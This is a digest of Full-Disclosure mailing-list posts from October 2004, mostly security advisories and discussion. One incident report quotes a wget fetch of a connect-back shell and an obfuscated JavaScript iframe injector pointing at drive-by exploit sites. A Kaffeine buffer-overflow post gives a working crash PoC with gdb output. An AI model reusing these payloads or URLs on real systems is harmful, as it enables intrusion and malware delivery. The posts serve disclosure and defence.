socat contains a syslog() based format string vulnerablility in the
'_msg()' function of 'error.c'. Exploitation of this bug is only
possible when socat is run with the '-ly' option, causing it to log
messages to syslog.

Impact
======

Remote exploitation is possible when socat is used as a HTTP proxy
client and connects to a malicious server. Local privilege escalation
can be achieved when socat listens on a UNIX domain socket. Potential
execution of arbitrary code with the privileges of the socat process is
possible with both local and remote exploitations.

Workaround
==========

Disable logging to syslog by not using the '-ly' option when starting
socat.

Resolution
==========

All socat users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=net-misc/socat-1.4.0.3"

References
==========

  [ 1 ] socat Security Advisory
        http://www.dest-unreach.org/socat/advisory/socat-adv-1.html

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200410-26.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
securitygentoo.org or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2004 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/1.0

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.6 (GNU/Linux)

iD8DBQBBfSVdRsm3eDkOu7kRAqwLAKCXUAuZ/AJ4bdTohy6HF2+iqqc1eQCfX0np
FgTOdLL0crpyupBFYm8yh/8=
=od8O
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] Re: [lists] python does mangleme (with IE bugs!)

From: Elliott Bäck (ecb29cornell.edu)
Date: Mon Oct 25 2004 - 11:43:53 CDT

The URL you give for the crash_IE files simply refresh until they get to
http://felinemenace.org/~nd/crash_ie/2447.html and show a 404 error...

Thanks,
Elliott C. Bäck

607-229-0623
119 Blair St. #2
------------------------------------------
www.spreadIE.com
www.elliottback.com

ned wrote:

>i've made a port of mangleme:
>http://felinemenace.org/~nd/htmler.py
>with a few extra quirks (such as file extentions/url types)
>
>it finds IE bugs after roughly 2.5 -> 3 hours and they are at:
>http://felinemenace.org/~nd/crash_ie/
>
>They are not the null pointer dereference that Michal found (which
>curiously seems to not own my 6.0.2800.1106.xpsp1?) but some other
>probably non-exploitable problems!
>
>htmler.py doesn't use CGI like mangleme but generates webpages in the
>directory 'html1' numbered 0.html to n.html. 0.html then uses a refresh to
>load 1.html and so on with little user interaction required!
>
>anyway, if you find bugs with it, don't sell to anyone/notify vendors!
>- nd
>
>
>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] Q: Linux Command Line Encryption

From: Mike Hoye (mhoyeneon.polkaroo.net)
Date: Mon Oct 25 2004 - 13:41:10 CDT

On Mon, Oct 25, 2004 at 08:33:41AM -0700, Denis Dimick wrote:
> Use GPG and keychain to store the key.

I've written a little widget that lets you "encrypt" a file using
another file as the "key"; I put those things in quotes because
it's a dumb little thing that does a quick-and-simple xor of the
first file against the other. I realize that this is barely
something you'd call encryption, but it might fill your needs.

It's called xork and it comes with no warranty whatsoever.

http://off.net/~mhoye/xork/

If anyone who is smarter than I am would like to suggest anything,
I'd be glad to hear it.

- Mike Hoye

--
Whenever I hear the question "Did you reboot?", I think of frat guys
in college saying "Didja fuck her?" - Scot Kurruk

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] Windows Time Synchronization - Best Practices

From: Andrew Farmer (andfarmteknovis.com)
Date: Mon Oct 25 2004 - 14:21:53 CDT

On 24 Oct 2004, at 18:48, Gary E. Miller wrote:
> On Fri, 22 Oct 2004, Micheal Espinola Jr wrote:
>> You can certainly have multiple time servers specified with Windows
>> Time Service (SNTP). RTM. It has the ability to failover through a
>> list.
>
> Yes you can have multiple time servers, but only one active at a time.
> With NTP your client polls a number of diverse servers. Routes can
> flap, servers can go wacko, but your time stays solid.

The canonical *NIX ntp client supports multiple active servers, if
that's what you're talking about.

No idea about Windows, though.

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (Darwin)

iD8DBQFBfVJRPa6RRaKl0ScRAsdEAJ45ZmyoxE+IkuDMwbmnoK04StDg6gCfXaCX
V3VY/gVPpmoJGHLRamzJ/mM=
=tSMI
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] xpire.info & splitinfinity.info - exploits in the wild

From: Ron DuFresne (dufresnewinternet.com)
Date: Mon Oct 25 2004 - 16:12:52 CDT

as pertains to compromised systems, the besty advice, unless you are doing
forensics to get a handle upon how the system was compromised or seeking
legal damages, is to just plain reinstall and make sure the system is
patched and properly firewalled prior to reconnecting it to the internet.
anything less then a reinstall is likely to permit the attacker to regain
entry to the system. Two points to mention, mysql should not be available
to the public, it should be firewalled off from public consumption, if it
can;'t be outright killed and uninstalled. php, is a problematic
scripting language, and requires someone with intense focus upon security
to lockdown. Never use the vast majority of php packages publically
available, we see 5-10 of them weekly suffering from security issues, some
popping up on a weekly or bi-weekly schedule.

3rd point, in these times with scp and sftp available, ftpd should be
turned off, uninstalled and access only granted via scp/sftp for file
transfers to a server.

Thanks,

Ron DuFresne

On Sun, 24 Oct 2004, Elia Florio wrote:

> Hi list,
> i'm doing some analysis on a Linux-Mandrake 9.0 web server
> of a person that was compromised in October.
> In this host now it's installed a special trojan that insert a
> malicious <IFRAME> tag into every served .PHP page.
>
> The host is running these services :
>
> Porta 21: 220 ProFTPD 1.2.5 Server (XXXXXXX FTP Server) [server]
> Porta 22: SSH-1.99-OpenSSH_3.4p1
> Porta 25: 220 XXXXX ESMTP 5.5.1
> Porta 110: +OK <XXXXXXXXXX>
> Porta 3306: MySQL 3.23.52
> Porte 80/443: Server: Apache-AdvancedExtranetServer/1.3.26 (Mandrake
> Linux/6mdk)
> sxnet/1.2.4 mod_ssl/2.8.10 OpenSSL/0.9.6g PHP/4.2.3
>
> I've found inside Apache log that the hacker break-in inside the machine
> using an overflow and injecting an executable /tmp/a.out via "qmail-inject".
> These are the suspicious log lines :
>
> [Sun Oct 3 03:35:10 2004] [notice] child pid 16012 exit signal Segmentation
> fault (11)
> [Sun Oct 3 04:08:34 2004] [notice] child pid 1272 exit signal Segmentation
> fault (11)
> [Sun Oct 3 07:18:27 2004] [notice] child pid 4397 exit signal Segmentation
> fault (11)
> [Mon Oct 4 02:27:55 2004] [notice] child pid 1203 exit signal Segmentation
> fault (11)
> qmail-inject: fatal: unable to parse this line:From: I.T.I.S. S. CANNIZZARO"
> <angdimaryahoo.it>
> [Mon Oct 4 18:43:02 2004] [notice] child pid 4248 exit signal Segmentation
> fault (11)
> [Mon Oct 4 22:58:50 2004] [notice] child pid 1190 exit signal Segmentation
> fault (11)
> [Tue Oct 5 11:58:13 2004] [notice] child pid 15689 exit signal Segmentation
> fault (11)
> qmail-inject: fatal: unable to parse this line:
> To: Drugo:Lebowskilibero.it
> sh: -c: option requires an argument
> --15:50:07-- http://xpire.info/cli.gz
> => `/tmp/a.out'
> Resolving xpire.info... fatto.
> Connecting to xpire.info[221.139.50.11]:80... connected.HTTP richiesta
> inviata, aspetto la risposta... 200 OK
> Lunghezza: 19,147 [text/plain]
>
> 0K .......... ........ 100% 9.97K
>
> 15:50:13 (9.97 KB/s) - `/tmp/a.out' salvato [19147/19147]
>
> [Fri Oct 8 20:26:52 2004] [notice] child pid 9647 exit signal Segmentation
> fault (11)
> [Sat Oct 9 01:09:51 2004] [notice] child pid 3840 exit signal Segmentation
> fault (11)
>
>
> Tryin a WGET of http://xpire.info/cli.gz , I get an ELF executable for
> Linux,
> possible containing a ConnectBack shell. Inside this ELF file you can grep
> these strings:
>
> Usage: %s host port
> pqrstuvwxyzabcde 0123456789abcdef /dev/ptmx /dev/pty /dev/tty sh -i Can't
> fork pty, bye!
> Fuck you so
> /bin/sh No connect
> Looking up %s... Failed!
> OK
> %u Connect Back
>
> I don't know if the hacker installs in this machine a rootkit, but the check
> of md5sum of
> ls, lsof, ps, netstat binaries with other ones from a clean Mandrake distr.
> was good.......
>
> The main problem is finding how the Apache Server (or PHP) was altered by
> the hacker,
> because every user that connects to this host now, could be infected by
> several HTML/IE recent exploits.
> Sniffing an HTTP packet from this host, I've found that *SOMETIMES* (in a
> random way??)
> web server inserts a special javascript between HTTP-Header and served page.
> The script is :
>
> <script language=javascript>
> eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,119,114,105,116,1
> 01,40,34,60,105,102,114,97,109,101,32,115,114,99,61,39,104,116,116,112,58,47
> ,47,119,119,119,46,115,112,108,105,116,105,110,102,105,110,105,116,121,46,10
> 5,110,102,111,47,102,97,47,63,100,61,103,101,116,39,32,104,101,105,103,104,1
> 16,61,49,32,119,105,100,116,104,61,49,62,60,47,105,102,114,97,109,101,62,34,
> 41))
> </script>
>
> Decoding it, I see that it writes inside the page an <IFRAME> tag pointing
> to this url :
>
> <iframe src='http://www.splitinfinity.info/fa/?d=get' height=1
> width=1></iframe>
>
> If you surf to this page (don't do this if you use IE or are not patched)
> you could got infected
> by several exploits, cause it opens a lot a <iframe> pointing out to
> different domains.
>
> I would to list here these domains, cause they are a sources
> for exploit studying :
>
> Domain: www.sp2fucked.biz
> http://69.50.168.147/user28/counter.htm
>
> Found MHTMLRedir.Exploit
> http://213.159.117.133/dl/adv121.php
>
> http://195.178.160.30/js.php?cust=28
>
> http://195.178.160.30/ifr.php?cust=89
>
> http://69.50.168.147/user28/exploit.htm
>
> Found Java class exploit
> http://69.50.168.147/user28/exploit2.htm
>
> My questions are :
>
> 1) how can I remove this injected Javascript/IFRAME ? I've checked
> httpd.conf and a lot of PHP pages,
> but I don't found anything.....Is it possible that the hacker install some
> compromised Apache module ..so???
>
> 2) anyone knows before these sites (xpire.info or splitinfinity.info)?
> why they are still online and are serving trojan/exploit on surfer browser?
> xpire.info is related to "Mike Fox".....but it sounds as a fake Jonh Doe
> registration!
>
> Domain ID: D5946452-LRMS
> Domain Name: XPIRE.INFO
> Created On: 23-May-2004 19:41:15 UTC
> Last Updated On: 02-Aug-2004 08:07:20 UTC
> Expiration Date: 23-May-2005 19:41:15 UTC
> Sponsoring Registrar: Direct Information Pvt Ltd. d/b/a Directi.com
> (R159-LRMS)
> Status: ACTIVE
> Status: OK
> Registrant ID: C4752858-LRMS
> Registrant Name: Mike Fox
> Registrant Organization: n/a
> Registrant Street1: Hali-gali, 77
> Registrant City: Deli
> Registrant Postal Code: 12345
> Registrant Country: IN
> Registrant Phone: +91.226370256
> Registrant Email: c8idkvtgarwinidkvt38yahoo.com
>
>
> 3) how can I understand if a rootkit was installed???
>
> Thanks anyone for replies
>
> EF
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>

--
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"Cutting the space budget really restores my faith in humanity. It
eliminates dreams, goals, and ideals and lets us get straight to the
business of hate, debauchery, and self-annihilation." -- Johnny Hart
        ***testing, only testing, and damn good at it too!***

OK, so you're a Ph.D. Just don't touch anything.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] RE: Full-Disclosure digest, Vol 1 #2001 - 32 msgs

From: Daniel Sichel (danielsPonderosatel.com)
Date: Mon Oct 25 2004 - 17:05:55 CDT

 
>In that case, I assume you are using IPSEC with shared secrets instead
>of certificates, no?
>
You got that right. A cerificate is only as good as the server that
issued it, and the directory it's in. Which in the case of Winblows is
not good enough. Therefore my shared secrets are kept in a directory
never shared, secured to the user and admin only, and maintained by
yours truly. If I could use OpenBSD clients instead, I would, but my
boss won't by off on a pure thin client solution.

Dan S.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] Q: Linux Command Line Encryption

From: Aaron Horst (anthrax101gmail.com)
Date: Mon Oct 25 2004 - 19:43:52 CDT

Decoding a file with repetitive XOR encryption is pretty easy. The
only way that this will be even remotely secure is if the encrypted
file is the same length or less then the length of the key file. The
danger then becomes transmitting the key file securely. This is called
a one-time pad. It is important that this key never be used again, or
it can be cracked.

Obviously, this is NOT a good idea for anything other then research
purposes, but it is a good way to learn about the dangers of improper
encryption.

AnthraX101

On Mon, 25 Oct 2004 14:41:10 -0400, Mike Hoye <mhoyeneon.polkaroo.net> wrote:
> On Mon, Oct 25, 2004 at 08:33:41AM -0700, Denis Dimick wrote:
> > Use GPG and keychain to store the key.
>
> I've written a little widget that lets you "encrypt" a file using
> another file as the "key"; I put those things in quotes because
> it's a dumb little thing that does a quick-and-simple xor of the
> first file against the other. I realize that this is barely
> something you'd call encryption, but it might fill your needs.
>
> It's called xork and it comes with no warranty whatsoever.
>
> http://off.net/~mhoye/xork/
>
> If anyone who is smarter than I am would like to suggest anything,
> I'd be glad to hear it.
>
> - Mike Hoye
>
> --
> Whenever I hear the question "Did you reboot?", I think of frat guys
> in college saying "Didja fuck her?" - Scot Kurruk
>
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] Posting w/o checking facts

From: Harry Hoffman (hhoffmanip-solutions.net)
Date: Mon Oct 25 2004 - 22:43:39 CDT

Hi,

Ok, I didn't think this needed to be said but why the hell are ppl
posting exploits without doing any actual testing?

WTF is up with that. Umm, ok I can say that XYZ is a problem cause it
"looks like it may be one".

NO, YOU CAN'T!!!! Or rather you can but then when everyone says your
name while trying to hold back a snicker don't seem surprised.

If you think something is a problem then test it! If you can't test it
than say so *clearly* in your post.

Making wild claims that a users' session can be hijacked or that you can
force your way into the xyz system without testing makes you sound
stupid (usually with good reason).

There have been at least three posts within the past couple of weeks
that make claims that are questionable at best and certainly don't come
with proof (or even anything that might closely resemble anything near
proof).

My $0.02 cents (and I'm sure others will share one way or another) ;-)

--Harry

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] Q: Linux Command Line Encryption

From: Mike Hoye (mhoyeneon.polkaroo.net)
Date: Mon Oct 25 2004 - 15:23:06 CDT

On Mon, Oct 25, 2004 at 08:33:41AM -0700, Denis Dimick wrote:
> Use GPG and keychain to store the key.

I've written a little widget that lets you "encrypt" a file using
another file as the "key"; I put those things in quotes because
it's a dumb little thing that does a quick-and-simple xor of the
first file against the other. I realize that this is barely
something you'd call encryption, but it might fill your needs.

It's called xork and it comes with no warranty whatsoever.

http://off.net/~mhoye/xork/

If anyone who is smarter than I am would like to suggest anything,
I'd be glad to hear it.

- Mike Hoye

--
"Theology is the effort to explain the unknowable in terms of the not
worth knowing." - H. L. Mencken

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [security] Re: [Full-Disclosure] FAKE: RedHat: Buffer Overflow in "ls" and "mkdir"

From: Brett Campbell (brettcustom-tech.net)
Date: Mon Oct 25 2004 - 16:07:27 CDT

On Sun, Oct 24, 2004 at 06:18:41PM -0700, Andrew Farmer wrote:
<snip>
> I did a quickie analysis of the program (which is basically just
> distributed as source!).
<snip>

when did you get a hold of the tarball? they must've yanked the record
for www.fedora-redhat.com ... it can't be resolved in any way.

pretty interesting (and pathetic) anyways, nice detective work.

--
[ Brett R. Campbell ]
 -> Configuration Management / Systems Administration
 -> Collaborative Agent Design Research Center
 -> California Polytechnic State University, SLO, CA
 http://www.cadrc.calpoly.edu/frameset_content/content_about_us.html

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] PTms04-030

From: pigrelax (pigrelaxyandex.ru)
Date: Tue Oct 26 2004 - 03:21:38 CDT

PTms04-030 - tool for checking WebDAV XML DoS vulnerability.

More information and download:

http://www.securitylab.ru/tools/48998.html

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] Kaffeine Media Player Conteny Type overflow

From: KF (kfinisterresecnetops.biz)
Date: Mon Oct 25 2004 - 20:06:24 CDT

Author did not respond and I could not exploit... enjoy.
there will be a proper advisory when I am not being so lazy
-KF

Kaffeine >=0.4.2
http://kaffeine.sourceforge.net/download.html

Tested on SuSE Linux 9.1 on source compiled from kaffeine-0.4.3b.tar.bz2
also Tested on various SuSE and Fedora RPMS

On SuSE Linux 9.1 (i586) - Kernel 2.6.5-7.108-default
http://www.suse.com/us/private/download/linuks/i386/update_for_9_1/extra.html
1558f5f4178cc1acbac0a068fb0bf43c kaffeine.rpm

ftp://packman.iu-bremen.de/testing/xine-cvs/kaffeine/
kaffeine-0.5cvs-200409180035.i686.rpm

ftp://packman.iu-bremen.de/suse/9.1/i686/
kaffeine-0.4.3b-0.pm.0.i686.rpm

http://rpm.pbone.net/index.php3/stat/17/dept/5/idg/Productivity_Multimedia_Video_Players
kaffeine-0.4.2-6.i586.rpm

Fedora Core release 2.90 (FC3 Test 1) Kernel 2.6.7-1.478custom on an i686
http://rpmseek.com/rpm-pl/kaffeine.html?hl=com&cx=0::
kaffeine-0.4.3-0.lvn.1.b.2.i386.rpm
kaffeine-0.4.3-0.lvn.1.b.1.i386.rpm

This can be triggered via any Real Audio Media - ram playlist file.

kaffeine-0.4.3b/kaffeine/playlist.cpp:
These are your file limitations.
PlayList::LoadRamPlaylist( const KURL& kurl, QListViewItem* after)
..
    /* check for ram playlist */
     if ( (ext == "ra") || (ext == "rm") || (ext == "ram") || (ext == "lsc") || (ext == "pl") )
     {
...
  
The overflow occurs here.
kaffeine-0.4.3b/kaffeine/http.c:

static http_t *http_open (const char *mrl) {

  http_t *this;
...
        if (sscanf(this->buf, "Content-Type: %s", mime_type) == 1) {

Sample exploitation.

To cause the exploit modify /etc/mimetypes for the .ram extension make it
AAAAAAAAAAAAAAAAAAAAA.... instead of audio/x-pn-realaudio

linux:/srv/www/htdocs # echo `perl -e 'print "A" x 316 . "ZZZZABCD"'` ram > /etc/mime.types ; /etc/init.d/apache2 restart
Syntax OK
Shutting down httpd2 (waiting for all children to terminate) done
Starting httpd2 (prefork)

[rootthreat root]# kaffeine http://192.168.1.207/test.pl
http: content length = 30 bytes
http: content type = 'text/plain;'
http: content length = 0 bytes
http: content type =
'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAZZZZABCD'
[rootthreat root]# KCrash: Application 'kaffeine' crashing...

create a file named exme.ram in your wwwroot
and create a file named test.pl with the contents:
http://host/exme.ram

Upon reading the test.pl file either via http or via double click kaffeine
will attempt to download the file exme.ram. It will check the mimetype
that the server is offering and procede to copy it into a small buffer.

This can also be exploited by directly viewing the .ram file.

exact eip hit looks like this
gdb) c
Continuing.
http: content length = 30 bytes
http: content type = 'text/plain;'
http: content length = 0 bytes
http: content type =
'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAZZZZABCD'

Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread -150400896 (LWP 2328)]
0x080b869c in SubtitleChooser::staticMetaObject ()
(gdb) bt
#0 0x080b869c in SubtitleChooser::staticMetaObject ()
#1 0x5a5a5a5a in ?? ()
#2 0x44434241 in ?? ()
#3 0x097a1200 in ?? ()
#4 0x00000000 in ?? ()
#5 0x00000000 in ?? ()
#6 0x00000000 in ?? ()
#7 0x00000000 in ?? ()
#8 0xfef17b28 in ?? ()
#9 0x09794b70 in ?? ()
#10 0x05f04ac0 in kde_malloc_is_used () from /usr/lib/libkdecore.so.4
#11 0x00000018 in ?? ()
#12 0x05f04ac0 in kde_malloc_is_used () from /usr/lib/libkdecore.so.4
#13 0x096c3770 in ?? ()
#14 0x096c3760 in ?? ()
#15 0x05f04ac0 in kde_malloc_is_used () from /usr/lib/libkdecore.so.4
#16 0xfef17b48 in ?? ()
#17 0x05ec8dea in malloc () from /usr/lib/libkdecore.so.4
Previous frame inner to this frame (corrupt stack?)

(gdb) i f
Stack level 0, frame at 0xfef17ae0:
 eip = 0x80b869c in SubtitleChooser::staticMetaObject(); saved eip
0x5a5a5a5a
 called by frame at 0xfef17ae4
 Arglist at 0xfef17ad8, args:
 Locals at 0xfef17ad8, Previous frame's sp is 0xfef17ae0
 Saved registers:
  ebp at 0xfef17ad8, eip at 0xfef17adc

0xfeea9b20: 'A' <repeats 200 times>...
0xfeea9be8: 'A' <repeats 116 times>, "ZZZZABCD"

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] FAKE: RedHat: Buffer Overflow in "ls" and "mkdir"

From: Stephen Jimson (alf1num3rikyahoo.com)
Date: Tue Oct 26 2004 - 04:57:59 CDT

<snip from the ISC's SANS>
The k-otik folks have an analysis of the bad things
that might happen if you follow the instructions in
the fake RedHat advisory that was reported in
yesterday's diary:

http://www.k-otik.com/news/FakeRedhatPatchAnalysis.txt

<snip>

the source code is also there

Steph

--- Brett Campbell <brettcustom-tech.net> wrote:

> On Sun, Oct 24, 2004 at 06:18:41PM -0700, Andrew
> Farmer wrote:
> <snip>
> > I did a quickie analysis of the program (which is
> basically just
> > distributed as source!).
> <snip>
>
> when did you get a hold of the tarball? they must've
> yanked the record
> for www.fedora-redhat.com ... it can't be resolved
> in any way.
>
> pretty interesting (and pathetic) anyways, nice
> detective work.
>
> --
> [ Brett R. Campbell ]
> -> Configuration Management / Systems
> Administration
> -> Collaborative Agent Design Research Center
> -> California Polytechnic State University, SLO, CA
>

                
__________________________________
Do you Yahoo!?
Yahoo! Mail Address AutoComplete - You start. We finish.
http://promotions.yahoo.com/new_mail

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] SUSE Security Announcement: xpdf, gpdf, kpdf, pdftohtml, cups (SUSE-SA:2004:039)

From: Thomas Biege (thomassuse.de)
Date: Tue Oct 26 2004 - 05:46:03 CDT

-----BEGIN PGP SIGNED MESSAGE-----

______________________________________________________________________________

                        SUSE Security Announcement

        Package: xpdf, gpdf, kdegraphics3-pdf, pdftohtml, cups
        Announcement-ID: SUSE-SA:2004:039
        Date: Tuesday, Oct 26th 2004 10:30 MEST
        Affected products: 8.1, 8.2, 9.0, 9.1, 9.2
                                SUSE Linux Enterprise Server 8, 9
                                SUSE Linux Desktop 1.0
        Vulnerability Type: remote system compromise
        Severity (1-10): 5
        SUSE default package: yes
        Cross References: CAN-2004-0888
                                CAN-2004-0889

    Content of this advisory:
        1) security vulnerability resolved:
             - integer overflows
             - arithmetic errors
           problem description
        2) solution/workaround
        3) special instructions and notes
        4) package location and checksums
        5) pending vulnerabilities, solutions, workarounds:
            - freeradius denial of service problems
            - mpg123
            - squid
        6) standard appendix (further information)

______________________________________________________________________________

1) problem description, brief discussion

    Xpdf is a widely used fast PDF file viewer. Various other PDF viewer
    and PDF conversion tools use xpdf code to accomplish their tasks.
    Chris Evans found several integer overflows and arithmetic errors.
    Additionally Sebastian Krahmer from the SuSE Security-Team found similar
    bugs in xpdf 3.
    These bugs can be exploited by tricking an user to open a malformated PDF
    file. As a result the PDF viewer can be crashed or may be even code can be
    executed.

2) solution/workaround

    Due to the wide usage of xpdf-based code we do not recommend switching to
    another PDF viewer as a workaround.
    You have to install the updates.

3) special instructions and notes

    Please restart all running instances of xpdf, gpdf, kpdf, pdftohtml, cups
    after updating successfully.

4) package location and checksums

    Please download the update package for your distribution and verify its
    integrity by the methods listed in section 3) of this announcement.
    Then, install the package using the command "rpm -Fhv file.rpm" to apply
    the update.
    Our maintenance customers are being notified individually. The packages
    are being offered to install from the maintenance web.

    Cups packages and all 9.2 packages will be available later.

    x86 Platform:

    SUSE Linux 9.1:
    ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/i586/pdftohtml-0.36-112.3.i586.rpm
      f17866987c9099ed8b0395d184adfffc
    ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/i586/xpdf-3.00-64.21.i586.rpm
      d648d6e96013cc339dd424041f8bc973
    ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/i586/gpdf-0.112.1-26.3.i586.rpm
      16864a7b7652a3183f9f8cac034cf70e
    ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/i586/kdegraphics3-pdf-3.2.1-67.6.i586.rpm
      8f09aa7927d9cdcfc52ab06e520b2441
    patch rpm(s):
    ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/i586/pdftohtml-0.36-112.3.i586.patch.rpm
      2d3da1271fc9e072186fca6aa1de8c5c
    ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/i586/xpdf-3.00-64.21.i586.patch.rpm
      093d0aaa7f4fbe24afc722057cbe334e
    ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/i586/gpdf-0.112.1-26.3.i586.patch.rpm
      3af8141ddfbdf558afdf4f2f8f94a9f8
    ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/i586/kdegraphics3-pdf-3.2.1-67.6.i586.patch.rpm
      0d765c907e89a91186e03d8c8de87857
    source rpm(s):
    ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/src/pdftohtml-0.36-112.3.src.rpm
      d4892578f2d84c1bdbc36b0df9341607
    ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/src/xpdf-3.00-64.21.src.rpm
      d4c06775143e5e6fec7bc544d248daee
    ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/src/gpdf-0.112.1-26.3.src.rpm
      cfda8ff6f352e1bc4f827a3118521b25
    ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/src/kdegraphics3-3.2.1-67.6.src.rpm
      bb4d96dd72f0ee94315afd7b4c81e16b

    SUSE Linux 9.0:
    ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/i586/pdftohtml-0.36-118.i586.rpm
      dc822cef09e27e169acd94cda1fb622a
    ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/i586/xpdf-2.02pl1-141.i586.rpm
      c99912bc5656546b028a8c4fe0473a75
    patch rpm(s):
    ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/i586/pdftohtml-0.36-118.i586.patch.rpm
      58b8a44ae02482d19c73959bfd85e85e
    ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/i586/xpdf-2.02pl1-141.i586.patch.rpm
      8055fbed4ac1e664706701e3b7d3e1bc
    source rpm(s):
    ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/src/pdftohtml-0.36-118.src.rpm
      35e37ded2db7d772d854748e606f42d0
    ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/src/xpdf-2.02pl1-141.src.rpm
      d42fe2976009b8ab44d6c166caf0840c

    SUSE Linux 8.2:
    ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/i586/xpdf-2.01-137.i586.rpm
      e198f2fc43f1f455676a9dc1ee42af5e
    patch rpm(s):
    ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/i586/xpdf-2.01-137.i586.patch.rpm
      acb5181c10c7b365cca71ae307b11553
    source rpm(s):
    ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/src/xpdf-2.01-137.src.rpm
      aada3bee6ac1517f50468777c49d8d91

    SUSE Linux 8.1:
    ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/xpdf-1.01-255.i586.rpm
      c0d7beba46d02e1090e9b6c7795a10c3
    patch rpm(s):
    ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/xpdf-1.01-255.i586.patch.rpm
      ac395b4518a4c83d2af7805f35626a22
    source rpm(s):
    ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/src/xpdf-1.01-255.src.rpm
      5ec84289ef8ca520e78cc80360d05665

    x86-64 Platform:

    SUSE Linux 9.1:
    ftp://ftp.suse.com/pub/suse/x86_64/update/9.1/rpm/x86_64/pdftohtml-0.36-112.3.x86_64.rpm
      2b0b08249164043db0e3a5b080b03f1d
    ftp://ftp.suse.com/pub/suse/x86_64/update/9.1/rpm/x86_64/xpdf-3.00-64.21.x86_64.rpm
      c10bbbb43b8af6bc4da4922ce2afaede
